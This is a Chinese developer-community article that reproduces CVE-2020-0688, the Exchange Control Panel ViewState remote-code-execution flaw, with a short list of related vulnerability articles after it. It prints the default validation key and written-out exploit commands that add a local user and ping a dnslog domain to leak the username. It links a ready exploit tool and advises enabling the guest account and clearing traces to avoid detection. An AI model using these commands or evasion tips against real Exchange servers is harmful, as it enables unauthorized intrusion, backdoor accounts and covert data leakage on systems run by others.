AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

CVE-2020-0688 exchange远程代码执行漏洞

2023-05-17 171
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: CVE-2020-0688 exchange远程代码执行漏洞

影响版本:


Microsoft Exchange Server 2010 Service Pack 3

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019


漏洞介绍:


所有Exchange Server在安装后的web.config文件中都拥有相同的validationKeydecryptionKey。这些密钥用于保证ViewState的安全性。而ViewStateASP.NET Web应用以序列化格式存储在客户机上的服务端数据。客户端通过__VIEWSTATE请求参数将这些数据返回给服务器。攻击者可以在ExchangeControl Panel web应用上执行任意.net代码。当攻击者通过各种手段获得一个可以访问Exchange Control Panel ECP)组件的用户账号密码时。攻击者可以在被攻击的exchange上执行任意代码,直接获取服务器权限。

 

注意事项:可以访问Exchange Control Panel ECP)组件的用户,EXP使用的时候不能含有中文路径!!!


准备工作:


--validationkey=CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因)

--validationalg = SHA1(默认,漏洞产生原因)

--generator=B97B4E27(基本默认)

--viewstateuserkey = ASP.NET_SessionId(可以通过手工获取变量,也可以通过脚本模拟用户登录获取该值)

以上4个值中仅需要用户登录之后访问/ecp/default.aspx 界面在header里面获取ASP.NET_SessionId,其余的均为默认值 

 

复现场景:

1. Windows Server 2012 R2 Datacenter

Exchange2013-x64-cu23

2. Windows Server 2012 R2 Datacenter

  Exchange2016   15.1.225

Exchange版本号查看方法:

官网给出的版本对照:

https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2016

 

在默认登陆界面右键查看源码:

 

使用方法:

python CVE-2020-0688_EXP.py -s https://192.168.1.152 -u test@exchange2016.com  -p !QAZ2wsx -c "cmd /c calc.exe"

 在目标机中打开计算器

 

-s 地址

-u 用户名

-p 用户名密码

-c 命令

 

python CVE-2020-0688_EXP.py -s https://192.168.1.152 -u temp@exchange2016.com  -p !QAZ2wsx -c "cmd /c  net user ad !QAZ2wsx /add"

添加新用户ad

 

注意事项:可以访问Exchange Control Panel ECP)组件的用户,这一点非常重要!!!

目前GitHub公开的exp利用工具很多都是作者用超级管理员账号进行的测试,但是对于普通用户来说,是无法进行使用的,所以本次复现中使用的exp是一个比较好的利用工具,可直接使用

链接地址:

https://github.com/Yt1g3r/CVE-2020-0688_EXP

关于后渗透阶段:

可参考:

https://www.freebuf.com/company-information/211051.html

 

1. 判断是否存在漏洞:

在判断是否存在漏洞中,从最初的版本利用来看,可以对未安装cve2020-0688安全补丁的Exchange Server 2013所有版本、Exchange Server 2016(截至2020317日之前的版本)、Exchange Server 2019(截至2020317日之前的版本)有效。在未打补丁的情况下,基本上算是一个通杀。

具体来讲,可以通过以下方式判断:

1)查看版本号和官网的版本进行对比

2)通过普通用户登录之后,访问https://exchnage/ecp/default.aspx

如果默认值为B97B4E27,且在headers中存在ASP.NET_SessionId则可能存在漏洞。


2. 判断存在漏洞的版本是否攻击成功

1)在渗透初期可以使用dnslog来探测命令是否执行成功,示例如下:

首先打开网址:https:dnslog.cn

使用命令如下:

python CVE-2020-0688_EXP.py -s https://192.168.1.160 -u Administrator@exchange2016.com -p !QAZ2wsx -c "cmd /c ping %USERNAME%.3d3uhm.dnslog.cn"

由此可以检测攻击有效。

注意事项在实际测试中,最好DNSlog服务自行搭建,申请临时域名来测试。

 

3. 攻击操作

https://www.freebuf.com/company-information/211051.html

可参考以上链接的内容,获取某个用户的密码账号等信息,方法有很多。

最好不要新建用户,可以采用激活guest的方法来,后期也要痕迹清理。

文章标签:
.NET
Windows
数据安全/隐私保护
安全
存储
开发框架
乌鸦安全
目录
相关文章
李火火
|
Web App开发 移动开发 安全
Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。
李火火
168 1
李火火
|
Web App开发 XML 安全
ZeroShell防火墙存在远程命令执行漏洞(CVE-2019-12725)
zeroshell防火墙存在远程命令执行漏洞,攻击者可通过特定URL链接对目标进行攻击!!!
李火火
331 1
香甜可口草莓蛋糕
|
3月前
|
安全 关系型数据库 网络安全
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
香甜可口草莓蛋糕
58 0
Vista_AX
|
XML 安全 Oracle
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Vista_AX
153 0
云鲨RASP
|
消息中间件 存储 安全
【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
漏洞分析,点击详阅
云鲨RASP
639 0
云鲨RASP
|
安全 Oracle Java
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
省流:全是干货!
云鲨RASP
287 0
游客du62snpusmjeg
|
JSON 供应链 安全
JsonWebToken远程代码执行漏洞(CVE-2022-23529)
JsonWebToken远程代码执行漏洞(CVE-2022-23529)
游客du62snpusmjeg
319 0
JsonWebToken远程代码执行漏洞(CVE-2022-23529)
5q2a2sugf4ej6
|
安全 关系型数据库 MySQL
CVE-2016-5734 phpmyadmin远程代码执行漏洞
CVE-2016-5734 phpmyadmin远程代码执行漏洞
5q2a2sugf4ej6
252 0
CVE-2016-5734 phpmyadmin远程代码执行漏洞
5q2a2sugf4ej6
|
安全 测试技术 PHP
CVE-2017-9841 phpunit 远程代码执行漏洞
CVE-2017-9841 phpunit 远程代码执行漏洞
5q2a2sugf4ej6
1879 0
CVE-2017-9841 phpunit 远程代码执行漏洞
Khan安全攻防实验室
|
安全 Windows Python
漏洞告之:SMBv3协议远程代码执行漏洞(附自查脚本)
SMBv3协议远程代码执行漏洞
Khan安全攻防实验室
494 0